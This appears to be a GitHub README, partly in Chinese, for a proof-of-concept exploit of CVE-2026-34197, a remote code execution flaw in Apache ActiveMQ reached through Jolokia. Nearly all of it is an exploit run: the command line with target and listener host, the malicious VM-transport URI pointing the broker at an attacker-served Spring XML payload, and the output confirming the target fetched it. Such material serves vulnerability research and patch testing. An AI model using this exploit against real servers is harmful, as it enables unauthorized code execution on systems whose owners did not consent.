dinosn/CVE-2026-34197

# CVE-2026-34197 CVE-2026-34197 activemq PoC 针对 ActiveMQ 的 PoC，基于 Horizon3 的文章 https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/ ``` krasn@icestorm cve-2026-34197-activemq % docker compose up -d krasn@icestorm cve-2026-34197-activemq % python3 exploit_poc.py auto \ --target http://localhost:8161 \ --lhost 192.168.1.17 --lport 9999 \ --cmd "touch /tmp/blahblah.txt" ====================================================================== CVE-2026-34197 — ActiveMQ RCE via Jolokia + VM Transport For authorized security testing and research only. ====================================================================== [*] Target: http://localhost:8161 [*] Command: touch /tmp/blahblah.txt [*] Serving malicious Spring XML on http://0.0.0.0:9999/evil.xml [+] Jolokia accessible — agent version: unknown [*] Could not discover broker name, using default 'localhost' [*] Sending exploit payload to http://localhost:8161/api/jolokia/ [*] Malicious URI: static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml) [+] Target fetched payload: /evil.xml [+] Target fetched payload: /evil.xml [+] Jolokia returned 200 — exploit payload delivered [+] Response: { "request": { "mbean": "org.apache.activemq:brokerName=localhost,type=Broker", "arguments": [ "static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)" ], "type": "exec", "operation": "addNetworkConnector(java.lang.String)" }, "value": "NC", "timestamp": 1775616523, "status": 200 } [*] Waiting 5s for target to fetch payload... [+] Target fetched payload: /evil.xml [+] Target fetched payload: /evil.xml [+] Target fetched payload: /evil.xml [+] Target fetched payload: /evil.xml [+] Done. Verify command execution on target. ```

标签：ActiveMQ, Apache ActiveMQ, Broker, CISA项目, CVE-2026-34197, Exploit, Jolokia, PoC, RCE, Spring XML, VM Transport, 中间件, 威胁模拟, 安全测试, 攻击性安全, 暴力破解, 概念验证, 消息队列, 漏洞复现, 编程工具, 网络安全, 请求拦截, 远程代码执行, 逆向工具, 隐私保护